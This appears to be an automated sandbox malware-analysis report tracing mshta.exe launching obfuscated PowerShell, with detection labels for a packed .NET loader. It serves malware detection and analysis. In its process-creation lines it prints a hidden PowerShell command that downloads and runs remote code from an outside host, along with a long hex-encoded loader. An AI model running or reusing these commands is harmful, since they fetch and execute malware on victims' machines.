Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 6.2.powershell.exe.7590000.1.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: 6.2.powershell.exe.7590000.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 6.2.powershell.exe.7590000.1.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: 6.2.powershell.exe.6e70000.0.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($z));$bytESTRInG = $ENC.$KFPPygMgLP1k8Q6dlweOupSSqCpkfoFRvU3qNhJ7UoZFcxhvUk6qVW3HARbKd0e3nWLlF3PmHTuWwjuB6i3MOMaxawv6WeSVm1ZTT9Ruabbj2NRbSFAaOQU699DWtX0FJupzRu6JgcZNJztD9XSm3blDcSPYvu
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
Yara detected Costura Assembly Loader
Source: Yara match File source: 6.2.powershell.exe.8220000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.57200410289.0000000008220000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Yara detected MSILLoadEncryptedAssembly
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B386E pushad ; iretd 6_2_006B3878
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B3948 pushad ; iretd 6_2_006B3952
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B392B pushad ; iretd 6_2_006B392C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B5900 push cs; ret 6_2_006B5910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B3983 push esp; iretd 6_2_006B398A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B7201 push edi; retn 0042h 6_2_006B7206
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B161D pushad ; retf 6_2_006B1621
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_006B57C0 push cs; ret 6_2_006B5910
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C35150 push esp; ret 6_2_06C35612
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C611BF push FFFFFFE8h; retf 6_2_06C611C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C7DFAB push es; iretd 6_2_06C7DFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C79F31 push A406C54Ah; ret 6_2_06C79F3D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C7ED88 pushad ; retf 6_2_06C7ED95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C92DE1 push es; retf 6_2_06C92E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C94218 push eax; ret 6_2_06C94219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06C9FA20 push edx; retf 6_2_06C9F9CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E62BCD push es; iretd 6_2_06E62BD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E62C1D push es; retf 6_2_06E62C28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E6ADBD push edx; retf 6_2_06E6ADC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_06E62D51 push es; iretd 6_2_06E62D54
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_07319C8F push 3C0704F5h; ret 6_2_07319C95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh 8_2_0043D812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00443469 push ebp; iretd 8_2_0044346C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0044366E push 9F00CD97h; ret 8_2_004436B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h 8_2_0043AE3E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_004477A5 push ebp; iretd 8_2_004477AA
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
